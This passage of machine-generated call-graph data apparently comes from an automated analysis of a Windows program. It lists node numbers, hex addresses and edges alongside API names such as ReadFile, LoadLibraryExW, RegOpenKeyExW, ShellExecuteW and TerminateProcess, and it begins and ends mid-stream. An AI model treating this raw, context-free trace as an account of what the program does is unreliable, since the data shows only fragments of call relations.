9f93c9 __fread_nolock 96330->96331 96332 9f93c0 96330->96332 96331->96315 96332->96331 96334 9faec9 96332->96334 96335 9faedc 96334->96335 96339 9faed9 __fread_nolock 96334->96339 96336 a0fddb 22 API calls 96335->96336 96337 9faee7 96336->96337 96338 a0fe0b 22 API calls 96337->96338 96338->96339 96339->96331 96345 9f54dd 96340->96345 96341 9f5564 SetFilePointerEx SetFilePointerEx 96343 9f5530 96341->96343 96342 a33f9c SetFilePointerEx 96343->96222 96344 a33f8b 96344->96342 96345->96341 96345->96342 96345->96343 96345->96344 96356 a0f1d8 96346->96356 96352 a0f1c1 96352->96239 96353->96239 96354->96241 96355->96241 96357 a0fe0b 22 API calls 96356->96357 96358 a0f1ef 96357->96358 96359 a0fddb 22 API calls 96358->96359 96360 a0f1a6 96359->96360 96361 9f97b6 96360->96361 96368 9f9a1e 96361->96368 96363 9f97fc 96363->96352 96367 9f6e14 24 API calls 96363->96367 96365 9f97c7 96365->96363 96375 9f9a40 96365->96375 96381 9f9b01 22 API calls __fread_nolock 96365->96381 96367->96352 96369 9f9a2f 96368->96369 96370 a3f378 96368->96370 96369->96365 96371 a0fddb 22 API calls 96370->96371 96372 a3f382 96371->96372 96373 a0fe0b 22 API calls 96372->96373 96374 a3f397 96373->96374 96376 9f9abb 96375->96376 96380 9f9a4e 96375->96380 96382 a0e40f SetFilePointerEx 96376->96382 96378 9f9a7c 96378->96365 96379 9f9a8c ReadFile 96379->96378 96379->96380 96380->96378 96380->96379 96381->96365 96382->96380 96383->96247 96384->96262 96385->96262 96386->96270 96387->96265 96389 a0fddb 22 API calls 96388->96389 96390 9f5433 96389->96390 96390->96299 96587 9f4e90 LoadLibraryA 96391->96587 96396 9f4ef6 LoadLibraryExW 96595 9f4e59 LoadLibraryA 96396->96595 96397 a33ccf 96399 9f4f39 68 API calls 96397->96399 96401 a33cd6 96399->96401 96403 9f4e59 3 API calls 96401->96403 96404 a33cde 96403->96404 96617 9f50f5 96404->96617 96405 9f4f20 96405->96404 96406 9f4f2c 96405->96406 96408 9f4f39 68 API calls 96406->96408 96410 9f4f31 96408->96410 96410->96022 96410->96023 96412 a33d05 96414 9fa961 22 API calls 96413->96414 96415 9f5275 96414->96415 96416 9fa961 22 API calls 96415->96416 96417 9f527d 96416->96417 96418 9fa961 22 API calls 96417->96418 96419 9f5285 96418->96419 96420 9fa961 22 API calls 96419->96420 96421 9f528d 96420->96421 96422 a33df5 96421->96422 96423 9f52c1 96421->96423 96424 9fa8c7 22 API calls 96422->96424 96425 9f6d25 22 API calls 96423->96425 96426 a33dfe 96424->96426 96427 9f52cf 96425->96427 96428 9fa6c3 22 API calls 96426->96428 96429 9f93b2 22 API calls 96427->96429 96431 9f5304 96428->96431 96430 9f52d9 96429->96430 96430->96431 96432 9f6d25 22 API calls 96430->96432 96433 9f5325 96431->96433 96447 9f5349 96431->96447 96450 a33e20 96431->96450 96435 9f52fa 96432->96435 96437 9f4c6d 22 API calls 96433->96437 96433->96447 96436 9f93b2 22 API calls 96435->96436 96436->96431 96440 9f5332 96437->96440 96438 9f5370 96439 9f5384 96438->96439 96445 9fa8c7 22 API calls 96438->96445 96444 9f538f 96439->96444 96448 9fa8c7 22 API calls 96439->96448 96446 9f6d25 22 API calls 96440->96446 96440->96447 96441 9f6b57 22 API calls 96452 a33ee0 96441->96452 96442 9f535a 96442->96438 96443 9fa8c7 22 API calls 96442->96443 96443->96438 96449 9fa8c7 22 API calls 96444->96449 96453 9f539a 96444->96453 96445->96439 96446->96447 96905 9f6d25 96447->96905 96448->96444 96449->96453 96450->96441 96451 9f4c6d 22 API calls 96451->96452 96452->96447 96452->96451 96918 9f49bd 22 API calls __fread_nolock 96452->96918 96453->96056 96456 9faec9 22 API calls 96455->96456 96457 9f4c78 96456->96457 96457->96061 96457->96062 96459 a34a51 96458->96459 96460 9f6362 96458->96460 96930 9f4a88 22 API calls __fread_nolock 96459->96930 96920 9f6373 96460->96920 96463 9f636e 96463->96069 96464 a34a5b 96465 a34a67 96464->96465 96466 9fa8c7 22 API calls 96464->96466 96466->96465 96577 9f33dd 96576->96577 96578 a330bb 96576->96578 97234 9f33ee 96577->97234 96580 a0fddb 22 API calls 96578->96580 96582 a330c5 _wcslen 96580->96582 96581 9f33e8 96581->96037 96583 a0fe0b 22 API calls 96582->96583 96584 a330fe __fread_nolock 96583->96584 96585->96047 96586->96059 96588 9f4ea8 GetProcAddress 96587->96588 96589 9f4ec6 96587->96589 96590 9f4eb8 96588->96590 96592 a1e5eb 96589->96592 96590->96589 96591 9f4ebf FreeLibrary 96590->96591 96591->96589 96625 a1e52a 96592->96625 96594 9f4eea 96594->96396 96594->96397 96596 9f4e6e GetProcAddress 96595->96596 96597 9f4e8d 96595->96597 96598 9f4e7e 96596->96598 96600 9f4f80 96597->96600 96598->96597 96599 9f4e86 FreeLibrary 96598->96599 96599->96597 96601 a0fe0b 22 API calls 96600->96601 96602 9f4f95 96601->96602 96603 9f5722 22 API calls 96602->96603 96604 9f4fa1 __fread_nolock 96603->96604 96605 9f50a5 96604->96605 96606 a33d1d 96604->96606 96616 9f4fdc 96604->96616 96677 9f42a2 CreateStreamOnHGlobal 96605->96677 96688 a6304d 74 API calls 96606->96688 96609 a33d22 96611 9f511f 64 API calls 96609->96611 96610 9f50f5 40 API calls 96610->96616 96612 a33d45 96611->96612 96613 9f50f5 40 API calls 96612->96613 96615 9f506e messages 96613->96615 96615->96405 96616->96609 96616->96610 96616->96615 96683 9f511f 96616->96683 96618 a33d70 96617->96618 96619 9f5107 96617->96619 96710 a1e8c4 96619->96710 96622 a628fe 96860 a6274e 96622->96860 96624 a62919 96624->96412 96627 a1e536 ___scrt_is_nonwritable_in_current_image 96625->96627 96626 a1e544 96650 a1f2d9 20 API calls _abort 96626->96650 96627->96626 96630 a1e574 96627->96630 96629 a1e549 96651 a227ec 26 API calls _abort 96629->96651 96632 a1e586 96630->96632 96633 a1e579 96630->96633 96642 a28061 96632->96642 96652 a1f2d9 20 API calls _abort 96633->96652 96636 a1e554 __wsopen_s 96636->96594 96637 a1e58f 96638 a1e5a2 96637->96638 96639 a1e595 96637->96639 96654 a1e5d4 LeaveCriticalSection __fread_nolock 96638->96654 96653 a1f2d9 20 API calls _abort 96639->96653 96643 a2806d ___scrt_is_nonwritable_in_current_image 96642->96643 96655 a22f5e EnterCriticalSection 96643->96655 96645 a2807b 96656 a280fb 96645->96656 96649 a280ac __wsopen_s 96649->96637 96650->96629 96651->96636 96652->96636 96653->96636 96654->96636 96655->96645 96663 a2811e 96656->96663 96657 a28088 96669 a280b7 96657->96669 96658 a28177 96659 a24c7d _abort 20 API calls 96658->96659 96660 a28180 96659->96660 96662 a229c8 _free 20 API calls 96660->96662 96664 a28189 96662->96664 96663->96657 96663->96658 96672 a1918d EnterCriticalSection 96663->96672 96673 a191a1 LeaveCriticalSection 96663->96673 96664->96657 96674 a23405 11 API calls 2 library calls 96664->96674 96666 a281a8 96675 a1918d EnterCriticalSection 96666->96675 96676 a22fa6 LeaveCriticalSection 96669->96676 96671 a280be 96671->96649 96672->96663 96673->96663 96674->96666 96675->96657 96676->96671 96678 9f42bc FindResourceExW 96677->96678 96682 9f42d9 96677->96682 96679 a335ba LoadResource 96678->96679 96678->96682 96680 a335cf SizeofResource 96679->96680 96679->96682 96681 a335e3 LockResource 96680->96681 96680->96682 96681->96682 96682->96616 96684 9f512e 96683->96684 96687 a33d90 96683->96687 96689 a1ece3 96684->96689 96688->96609 96692 a1eaaa 96689->96692 96691 9f513c 96691->96616 96694 a1eab6 ___scrt_is_nonwritable_in_current_image 96692->96694 96693 a1eac2 96705 a1f2d9 20 API calls _abort 96693->96705 96694->96693 96696 a1eae8 96694->96696 96707 a1918d EnterCriticalSection 96696->96707 96697 a1eac7 96706 a227ec 26 API calls _abort 96697->96706 96700 a1eaf4 96708 a1ec0a 62 API calls 2 library calls 96700->96708 96702 a1eb08 96709 a1eb27 LeaveCriticalSection __fread_nolock 96702->96709 96704 a1ead2 __wsopen_s 96704->96691 96705->96697 96706->96704 96707->96700 96708->96702 96709->96704 96713 a1e8e1 96710->96713 96712 9f5118 96712->96622 96714 a1e8ed ___scrt_is_nonwritable_in_current_image 96713->96714 96715 a1e900 ___scrt_fastfail 96714->96715 96716 a1e92d 96714->96716 96717 a1e925 __wsopen_s 96714->96717 96740 a1f2d9 20 API calls _abort 96715->96740 96726 a1918d EnterCriticalSection 96716->96726 96717->96712 96720 a1e937 96727 a1e6f8 96720->96727 96721 a1e91a 96741 a227ec 26 API calls _abort 96721->96741 96726->96720 96729 a1e70a ___scrt_fastfail 96727->96729 96733 a1e727 96727->96733 96728 a1e717 96815 a1f2d9 20 API calls _abort 96728->96815 96729->96728 96729->96733 96736 a1e76a __fread_nolock 96729->96736 96731 a1e71c 96816 a227ec 26 API calls _abort 96731->96816 96742 a1e96c LeaveCriticalSection __fread_nolock 96733->96742 96734 a1e886 ___scrt_fastfail 96818 a1f2d9 20 API calls _abort 96734->96818 96736->96733 96736->96734 96743 a1d955 96736->96743 96750 a28d45 96736->96750 96817 a1cf78 26 API calls 4 library calls 96736->96817 96740->96721 96741->96717 96742->96717 96744 a1d961 96743->96744 96745 a1d976 96743->96745 96819 a1f2d9 20 API calls _abort 96744->96819 96745->96736 96747 a1d966 96820 a227ec 26 API calls _abort 96747->96820 96749 a1d971 96749->96736 96751 a28d57 96750->96751 96752 a28d6f 96750->96752 96830 a1f2c6 20 API calls _abort 96751->96830 96753 a290d9 96752->96753 96759 a28db4 96752->96759 96852 a1f2c6 20 API calls _abort 96753->96852 96756 a28d5c 96831 a1f2d9 20 API calls _abort 96756->96831 96758 a290de 96853 a1f2d9 20 API calls _abort 96758->96853 96760 a28d64 96759->96760 96762 a28dbf 96759->96762 96768 a28def 96759->96768 96760->96736 96832 a1f2c6 20 API calls _abort 96762->96832 96763 a28dcc 96854 a227ec 26 API calls _abort 96763->96854 96765 a28dc4 96833 a1f2d9 20 API calls _abort 96765->96833 96769 a28e08 96768->96769 96770 a28e4a 96768->96770 96771 a28e2e 96768->96771 96769->96771 96772 a28e15 96769->96772 96837 a23820 96770->96837 96834 a1f2c6 20 API calls _abort 96771->96834 96821 a2f89b 96772->96821 96774 a28e33 96835 a1f2d9 20 API calls _abort 96774->96835 96779 a28e3a 96836 a227ec 26 API calls _abort 96779->96836 96780 a28fb3 96784 a29029 96780->96784 96787 a28fcc GetConsoleMode 96780->96787 96781 a229c8 _free 20 API calls 96782 a28e6a 96781->96782 96785 a229c8 _free 20 API calls 96782->96785 96786 a2902d ReadFile 96784->96786 96788 a28e71 96785->96788 96789 a290a1 GetLastError 96786->96789 96790 a29047 96786->96790 96787->96784 96791 a28fdd 96787->96791 96792 a28e96 96788->96792 96793 a28e7b 96788->96793 96794 a29005 96789->96794 96795 a290ae 96789->96795 96790->96789 96796 a2901e 96790->96796 96791->96786 96797 a28fe3 ReadConsoleW 96791->96797 96846 a29424 28 API calls __wsopen_s 96792->96846 96844 a1f2d9 20 API calls _abort 96793->96844 96813 a28e45 __fread_nolock 96794->96813 96847 a1f2a3 20 API calls 2 library calls 96794->96847 96850 a1f2d9 20 API calls _abort 96795->96850 96808 a29083 96796->96808 96809 a2906c 96796->96809 96796->96813 96797->96796 96802 a28fff GetLastError 96797->96802 96798 a229c8 _free 20 API calls 96798->96760 96802->96794 96803 a28e80 96845 a1f2c6 20 API calls _abort 96803->96845 96804 a290b3 96851 a1f2c6 20 API calls _abort 96804->96851 96810 a2909a 96808->96810 96808->96813 96848 a28a61 31 API calls 4 library calls 96809->96848 96849 a288a1 29 API calls __wsopen_s 96810->96849 96813->96798 96814 a2909f 96814->96813 96815->96731 96816->96733 96817->96736 96818->96731 96819->96747 96820->96749 96822 a2f8b5 96821->96822 96823 a2f8a8 96821->96823 96825 a2f8c1 96822->96825 96856 a1f2d9 20 API calls _abort 96822->96856 96855 a1f2d9 20 API calls _abort 96823->96855 96825->96780 96827 a2f8ad 96827->96780 96828 a2f8e2 96857 a227ec 26 API calls _abort 96828->96857 96830->96756 96831->96760 96832->96765 96833->96763 96834->96774 96835->96779 96836->96813 96838 a2385e 96837->96838 96839 a2382e _abort 96837->96839 96859 a1f2d9 20 API calls _abort 96838->96859 96839->96838 96841 a23849 RtlAllocateHeap 96839->96841 96858 a14ead 7 API calls 2 library calls 96839->96858 96841->96839 96842 a2385c 96841->96842 96842->96781 96844->96803 96845->96813 96846->96772 96847->96813 96848->96813 96849->96814 96850->96804 96851->96813 96852->96758 96853->96763 96854->96760 96855->96827 96856->96828 96857->96827 96858->96839 96859->96842 96863 a1e4e8 96860->96863 96862 a6275d 96862->96624 96866 a1e469 96863->96866 96865 a1e505 96865->96862 96867 a1e478 96866->96867 96869 a1e48c 96866->96869 96881 a1f2d9 20 API calls _abort 96867->96881 96873 a1e488 __alldvrm 96869->96873 96874 a2333f 96869->96874 96870 a1e47d 96882 a227ec 26 API calls _abort 96870->96882 96873->96865 96883 a22fd7 96874->96883 96877 a2337e GetSystemTimeAsFileTime 96878 a23372 96877->96878 96890 a10a8c 96878->96890 96880 a2338f 96880->96873 96881->96870 96882->96873 96884 a23007 96883->96884 96887 a23003 96883->96887 96884->96877 96884->96878 96885 a23027 96885->96884 96888 a23033 GetProcAddress 96885->96888 96887->96884 96887->96885 96897 a23073 96887->96897 96889 a23043 __crt_fast_encode_pointer 96888->96889 96889->96884 96891 a10a95 96890->96891 96892 a10a97 IsProcessorFeaturePresent 96890->96892 96891->96880 96894 a10c5d 96892->96894 96904 a10c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96894->96904 96896 a10d40 96896->96880 96898 a23094 LoadLibraryExW 96897->96898 96899 a23089 96897->96899 96900 a230b1 GetLastError 96898->96900 96901 a230c9 96898->96901 96899->96887 96900->96901 96903 a230bc LoadLibraryExW 96900->96903 96901->96899 96902 a230e0 FreeLibrary 96901->96902 96902->96899 96903->96901 96904->96896 96906 9f6d34 96905->96906 96907 9f6d91 96905->96907 96906->96907 96909 9f6d3f 96906->96909 96908 9f93b2 22 API calls 96907->96908 96914 9f6d62 __fread_nolock 96908->96914 96910 9f6d5a 96909->96910 96911 a34c9d 96909->96911 96919 9f6f34 22 API calls 96910->96919 96913 a0fddb 22 API calls 96911->96913 96915 a34ca7 96913->96915 96914->96442 96916 a0fe0b 22 API calls 96915->96916 96917 a34cda 96916->96917 96918->96452 96919->96914 96921 9f63b6 __fread_nolock 96920->96921 96923 9f6382 96920->96923 96921->96463 96922 a34a82 96925 a0fddb 22 API calls 96922->96925 96923->96921 96923->96922 96924 9f63a9 96923->96924 96931 9fa587 96924->96931 96930->96464 97235 9f33fe _wcslen 97234->97235 97236 a3311d 97235->97236 97237 9f3411 97235->97237 97239 a0fddb 22 API calls 97236->97239 97238 9fa587 22 API calls 97237->97238 97240 9f341e __fread_nolock 97238->97240 97241 a33127 97239->97241 97240->96581 97242 a0fe0b 22 API calls 97241->97242 97243 a33157 __fread_nolock 97242->97243 97245 9f7510 53 API calls 97244->97245 97246 a77f90 97245->97246 97250 a77fd5 messages 97246->97250 97282 a78cd3 97246->97282 97248 a78049 97248->97250 97256 9f7510 53 API calls 97248->97256 97270 a78281 97248->97270 97314 a5417d 22 API calls __fread_nolock 97248->97314 97315 a7851d 42 API calls _strftime 97248->97315 97249 a7844f 97323 a78ee4 60 API calls 97249->97323 97250->96089 97253 a7845e 97254 a7828f 97253->97254 97255 a7846a 97253->97255 97295 a77e86 97254->97295 97255->97250 97256->97248 97261 a782c8 97310 a0fc70 97261->97310 97264 a78302 97317 9f63eb 22 API calls 97264->97317 97265 a782e8 97316 a6359c 82 API calls __wsopen_s 97265->97316 97268 a782f3 GetCurrentProcess TerminateProcess 97268->97264 97269 a78311 97318 9f6a50 22 API calls 97269->97318 97270->97249 97270->97254 97272 a7832a 97281 a78352 97272->97281 97319 a004f0 22 API calls 97272->97319 97274 a784c5 97274->97250 97277 a784d9 FreeLibrary 97274->97277 97275 a78341 97320 a78b7b 75 API calls 97275->97320 97277->97250 97281->97274 97321 a004f0 22 API calls 97281->97321 97322 9faceb 23 API calls messages 97281->97322 97324 a78b7b 75 API calls 97281->97324 97283 9faec9 22 API calls 97282->97283 97284 a78cee CharLowerBuffW 97283->97284 97325 a58e54 97284->97325 97288 9fa961 22 API calls 97289 a78d2a 97288->97289 97290 9f6d25 22 API calls 97289->97290 97291 a78d3e 97290->97291 97292 9f93b2 22 API calls 97291->97292 97294 a78d48 _wcslen 97292->97294 97293 a78e5e _wcslen 97293->97248 97294->97293 97332 a7851d 42 API calls _strftime 97294->97332 97296 a77ea1 97295->97296 97297 a77eec 97295->97297 97298 a0fe0b 22 API calls 97296->97298 97301 a79096 97297->97301 97299 a77ec3 97298->97299 97299->97297 97300 a0fddb 22 API calls 97299->97300 97300->97299 97302 a792ab messages 97301->97302 97309 a790ba _strcat _wcslen 97301->97309 97302->97261 97303 9fb567 39 API calls 97303->97309 97304 9fb38f 39 API calls 97304->97309 97305 9fb6b5 39 API calls 97305->97309 97306 9f7510 53 API calls 97306->97309 97307 a1ea0c 21 API calls ___std_exception_copy 97307->97309 97309->97302 97309->97303 97309->97304 97309->97305 97309->97306 97309->97307 97335 a5efae 24 API calls _wcslen 97309->97335 97311 a0fc85 97310->97311 97312 a0fd1d VirtualAlloc 97311->97312 97313 a0fceb 97311->97313 97312->97313 97313->97264 97313->97265 97314->97248 97315->97248 97316->97268 97317->97269 97318->97272 97319->97275 97320->97281 97321->97281 97322->97281 97323->97253 97324->97281 97326 a58e74 _wcslen 97325->97326 97327 a58f63 97326->97327 97328 a58ea9 97326->97328 97331 a58f68 97326->97331 97327->97288 97327->97294 97328->97327 97333 a0ce60 41 API calls 97328->97333 97331->97327 97334 a0ce60 41 API calls 97331->97334 97332->97293 97333->97328 97334->97331 97335->97309 97337 a5d4d5 97336->97337 97338 a5dbdc GetFileAttributesW 97336->97338 97337->95872 97338->97337 97339 a5dbe8 FindFirstFileW 97338->97339 97339->97337 97340 a5dbf9 FindClose 97339->97340 97340->97337 97342 9f6270 22 API calls 97341->97342 97351 9f9eb5 97342->97351 97343 9f9fd2 97370 9fa4a1 22 API calls __fread_nolock 97343->97370 97345 9f9fec 97345->96097 97348 9fa12c __fread_nolock 97349 a3f7c4 97348->97349 97361 9fa405 97348->97361 97375 a596e2 84 API calls __wsopen_s 97349->97375 97350 a3f699 97357 a0fddb 22 API calls 97350->97357 97351->97343 97351->97348 97351->97349 97351->97350 97356 9fa6c3 22 API calls 97351->97356 97351->97361 97364 9fa587 22 API calls 97351->97364 97365 9fa4a1 22 API calls 97351->97365 97366 9faec9 22 API calls 97351->97366 97369 9f4573 41 API calls _wcslen 97351->97369 97372 9f48c8 23 API calls 97351->97372 97373 9f49bd 22 API calls __fread_nolock 97351->97373 97374 9fa673 22 API calls 97351->97374 97353 a3f7d2 97376 9fa4a1 22 API calls __fread_nolock 97353->97376 97356->97351 97358 a3f754 97357->97358 97362 a0fe0b 22 API calls 97358->97362 97360 a3f7e8 97360->97345 97361->97345 97377 a596e2 84 API calls __wsopen_s 97361->97377 97362->97348 97364->97351 97365->97351 97367 9fa0db CharUpperBuffW 97366->97367 97371 9fa673 22 API calls 97367->97371 97369->97351 97370->97345 97371->97351 97372->97351 97373->97351 97374->97351 97375->97353 97376->97360 97377->97345 97378->96150 97379->96154 97380->96152 97381->96160 97382->96160 97383->96170 97384->96173 97385->96177 97386 a42a00 97401 9fd7b0 messages 97386->97401 97387 9fdb11 PeekMessageW 97387->97401 97388 9fd807 GetInputState 97388->97387 97388->97401 97389 a41cbe TranslateAcceleratorW 97389->97401 97391 9fdb8f PeekMessageW 97391->97401 97392 9fda04 timeGetTime 97392->97401 97393 9fdb73 TranslateMessage DispatchMessageW 97393->97391 97394 9fdbaf Sleep 97412 9fdbc0 97394->97412 97395 a42b74 Sleep 97395->97412 97396 a0e551 timeGetTime 97396->97412 97397 a41dda timeGetTime 97507 a0e300 23 API calls 97397->97507 97400 a42c0b GetExitCodeProcess 97402 a42c37 CloseHandle 97400->97402 97403 a42c21 WaitForSingleObject 97400->97403 97401->97387 97401->97388 97401->97389 97401->97391 97401->97392 97401->97393 97401->97394 97401->97395 97401->97397 97406 9fd9d5 97401->97406 97414 9fec40 256 API calls 97401->97414 97415 a01310 256 API calls 97401->97415 97418 9fdd50 97401->97418 97425 9fdfd0 97401->97425 97448 9fbf40 97401->97448 97506 a0edf6 IsDialogMessageW GetClassLongW 97401->97506 97508 a63a2a 23 API calls 97401->97508 97509 a6359c 82 API calls __wsopen_s 97401->97509 97402->97412 97403->97401 97403->97402 97404 a42a31 97404->97406 97405 a829bf GetForegroundWindow 97405->97412 97408 a42ca9 Sleep 97408->97401 97412->97396 97412->97400 97412->97401 97412->97404 97412->97405 97412->97406 97412->97408 97510 a75658 23 API calls 97412->97510 97511 a5e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97412->97511 97512 a5d4dc 47 API calls 97412->97512 97414->97401 97415->97401 97419 9fdd6f 97418->97419 97420 9fdd83 97418->97420 97513 9fd260 256 API calls 2 library calls 97419->97513 97514 a6359c 82 API calls __wsopen_s 97420->97514 97422 9fdd7a 97422->97401 97424 a42f75 97424->97424 97426 9fe010 97425->97426 97445 9fe0dc messages 97426->97445 97517 a10242 5 API calls __Init_thread_wait 97426->97517 97429 a42fca 97431 9fa961 22 API calls 97429->97431 97429->97445 97430 9fa961 22 API calls 97430->97445 97434 a42fe4 97431->97434 97518 a100a3 29 API calls __onexit 97434->97518 97437 a42fee 97519 a101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97437->97519 97439 a6359c 82 API calls 97439->97445 97441 9fa8c7 22 API calls 97441->97445 97442 a004f0 22 API calls 97442->97445 97443 9fec40 256 API calls 97443->97445 97444 9fe3e1 97444->97401 97445->97430 97445->97439 97445->97441 97445->97442 97445->97443 97445->97444 97515 9fa81b 41 API calls 97445->97515 97516 a0a308 256 API calls 97445->97516 97520 a10242 5 API calls __Init_thread_wait 97445->97520 97521 a100a3 29 API calls __onexit 97445->97521 97522 a101f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97445->97522 97523 a747d4 256 API calls 97445->97523 97524 a768c1 256 API calls 97445->97524 97525 9fadf0 97448->97525 97450 9fbf9d 97451 a404b6 97450->97451 97452 9fbfa9 97450->97452 97544 a6359c 82 API calls __wsopen_s 97451->97544 97453 9fc01e 97452->97453 97454 a404c6 97452->97454 97530 9fac91 97453->97530 97545 a6359c 82 API calls __wsopen_s 97454->97545 97458 9fc7da 97462 a0fe0b 22 API calls 97458->97462 97467 9fc808 __fread_nolock 97462->97467 97464 a404f5 97468 a4055a 97464->97468 97546 a0d217 256 API calls 97464->97546 97472 a0fe0b 22 API calls 97467->97472 97505 9fc603 97468->97505 97547 a6359c 82 API calls __wsopen_s 97468->97547 97469 9fec40 256 API calls 97504 9fc039 __fread_nolock messages 97469->97504 97470 a4091a 97557 a63209 23 API calls 97470->97557 97471 a57120 22 API calls 97471->97504 97494 9fc350 __fread_nolock messages 97472->97494 97473 9faf8a 22 API calls 97473->97504 97476 a408a5 97477 9fec40 256 API calls 97476->97477 97479 a408cf 97477->97479 97479->97505 97555 9fa81b 41 API calls 97479->97555 97480 a40591 97548 a6359c 82 API calls __wsopen_s 97480->97548 97481 a408f6 97556 a6359c 82 API calls __wsopen_s 97481->97556 97486 9fc3ac 97486->97401 97488 9fc237 97490 9fc253 97488->97490 97491 9fa8c7 22 API calls 97488->97491 97489 a0fddb 22 API calls 97489->97504 97493 a40976 97490->97493 97497 9fc297 messages 97490->97497 97491->97490 97492 a0fe0b 22 API calls 97492->97504 97558 9faceb 23 API calls messages 97493->97558 97494->97486 97543 a0ce17 22 API calls messages 97494->97543 97498 a409bf 97497->97498 97541 9faceb 23 API calls messages 97497->97541 97498->97505 97559 a6359c 82 API calls __wsopen_s 97498->97559 97500 9fc335 97500->97498 97502 9fc342 97500->97502 97501 9fbbe0 40 API calls 97501->97504 97542 9fa704 22 API calls messages 97502->97542 97504->97458 97504->97464 97504->97467 97504->97468 97504->97469 97504->97470 97504->97471 97504->97473 97504->97476 97504->97480 97504->97481 97504->97488 97504->97489 97504->97492 97504->97498 97504->97501 97504->97505 97534 9fad81 97504->97534 97549 a57099 22 API calls __fread_nolock 97504->97549 97550 a75745 54 API calls _wcslen 97504->97550 97551 a0aa42 22 API calls messages 97504->97551 97552 a5f05c 40 API calls 97504->97552 97553 9fa993 41 API calls 97504->97553 97554 9faceb 23 API calls messages 97504->97554 97505->97401 97506->97401 97507->97401 97508->97401 97509->97401 97510->97412 97511->97412 97512->97412 97513->97422 97514->97424 97515->97445 97516->97445 97517->97429 97518->97437 97519->97445 97520->97445 97521->97445 97522->97445 97523->97445 97524->97445 97526 9fae01 97525->97526 97529 9fae1c messages 97525->97529 97527 9faec9 22 API calls 97526->97527 97528 9fae09 CharUpperBuffW 97527->97528 97528->97529 97529->97450 97531 9facae 97530->97531 97532 9facd1 97531->97532 97560 a6359c 82 API calls __wsopen_s 97531->97560 97532->97504 97535 a3fadb 97534->97535 97536 9fad92 97534->97536 97537 a0fddb 22 API calls 97536->97537 97538 9fad99 97537->97538 97561 9fadcd 97538->97561 97541->97500 97542->97494 97543->97494 97544->97454 97545->97505 97546->97468 97547->97505 97548->97505 97549->97504 97550->97504 97551->97504 97552->97504 97553->97504 97554->97504 97555->97481 97556->97505 97557->97488 97558->97498 97559->97505 97560->97532 97564 9faddd 97561->97564 97562 9fadb6 97562->97504 97563 a0fddb 22 API calls 97563->97564 97564->97562 97564->97563 97565 9fa961 22 API calls 97564->97565 97566 9fa8c7 22 API calls 97564->97566 97567 9fadcd 22 API calls 97564->97567 97565->97564 97566->97564 97567->97564 97568 9f105b 97573 9f344d 97568->97573 97570 9f106a 97604 a100a3 29 API calls __onexit 97570->97604 97572 9f1074 97574 9f345d __wsopen_s 97573->97574 97575 9fa961 22 API calls 97574->97575 97576 9f3513 97575->97576 97605 9f3a5a 97576->97605 97578 9f351c 97612 9f3357 97578->97612 97581 9f33c6 22 API calls 97582 9f3535 97581->97582 97618 9f515f 97582->97618 97585 9fa961 22 API calls 97586 9f354d 97585->97586 97587 9fa6c3 22 API calls 97586->97587 97588 9f3556 RegOpenKeyExW 97587->97588 97589 a33176 RegQueryValueExW 97588->97589 97593 9f3578 97588->97593 97590 a33193 97589->97590 97591 a3320c RegCloseKey 97589->97591 97592 a0fe0b 22 API calls 97590->97592 97591->97593 97603 a3321e _wcslen 97591->97603 97594 a331ac 97592->97594 97593->97570 97595 9f5722 22 API calls 97594->97595 97596 a331b7 RegQueryValueExW 97595->97596 97597 a331d4 97596->97597 97600 a331ee messages 97596->97600 97598 9f6b57 22 API calls 97597->97598 97598->97600 97599 9f4c6d 22 API calls 97599->97603 97600->97591 97601 9f9cb3 22 API calls 97601->97603 97602 9f515f 22 API calls 97602->97603 97603->97593 97603->97599 97603->97601 97603->97602 97604->97572 97624 a31f50 97605->97624 97608 9f9cb3 22 API calls 97609 9f3a8d 97608->97609 97626 9f3aa2 97609->97626 97611 9f3a97 97611->97578 97613 a31f50 __wsopen_s 97612->97613 97614 9f3364 GetFullPathNameW 97613->97614 97615 9f3386 97614->97615 97616 9f6b57 22 API calls 97615->97616 97617 9f33a4 97616->97617 97617->97581 97620 9f516e 97618->97620 97623 9f518f __fread_nolock 97618->97623 97619 a0fddb 22 API calls 97622 9f3544 97619->97622 97621 a0fe0b 22 API calls 97620->97621 97621->97623 97622->97585 97623->97619 97625 9f3a67 GetModuleFileNameW 97624->97625 97625->97608 97627 a31f50 __wsopen_s 97626->97627 97628 9f3aaf GetFullPathNameW 97627->97628 97629 9f3ace 97628->97629 97630 9f3ae9 97628->97630 97631 9f6b57 22 API calls 97629->97631 97632 9fa6c3 22 API calls 97630->97632 97633 9f3ada 97631->97633 97632->97633 97636 9f37a0 97633->97636 97637 9f37ae 97636->97637 97638 9f93b2 22 API calls 97637->97638 97639 9f37c2 97638->97639 97639->97611 97640 a32ba5 97641 9f2b25 97640->97641 97642 a32baf 97640->97642 97668 9f2b83 7 API calls 97641->97668 97644 9f3a5a 24 API calls 97642->97644 97646 a32bb8 97644->97646 97648 9f9cb3 22 API calls 97646->97648 97650 a32bc6 97648->97650 97649 9f2b2f 97660 9f2b44 97649->97660 97672 9f3837 49 API calls ___scrt_fastfail 97649->97672 97651 a32bf5 97650->97651 97652 a32bce 97650->97652 97654 9f33c6 22 API calls 97651->97654 97653 9f33c6 22 API calls 97652->97653 97656 a32bd9 97653->97656 97657 a32bf1 GetForegroundWindow ShellExecuteW 97654->97657 97658 9f6350 22 API calls 97656->97658 97664 a32c26 97657->97664 97662 a32be7 97658->97662 97659 9f2b5f 97666 9f2b66 SetCurrentDirectoryW 97659->97666 97660->97659 97673 9f30f2 Shell_NotifyIconW ___scrt_fastfail 97660->97673 97665 9f33c6 22 API calls 97662->97665 97664->97659 97665->97657 97667 9f2b7a 97666->97667 97674 9f2cd4 7 API calls 97668->97674 97670 9f2b2a 97671 9f2c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97670->97671 97671->97649 97672->97660 97673->97659 97674->97670 97675 9f1098 97680 9f42de 97675->97680 97679 9f10a7 97681 9fa961 22 API calls 97680->97681 97682 9f42f5 GetVersionExW 97681->97682 97683 9f6b57 22 API calls 97682->97683 97684 9f4342 97683->97684 97685 9f93b2 22 API calls 97684->97685 97689 9f4378 97684->97689 97686 9f436c 97685->97686 97688 9f37a0 22 API calls 97686->97688 97687 9f441b GetCurrentProcess IsWow64Process 97690 9f4437 97687->97690 97688->97689 97689->97687 97691 a337df 97689->97691 97692 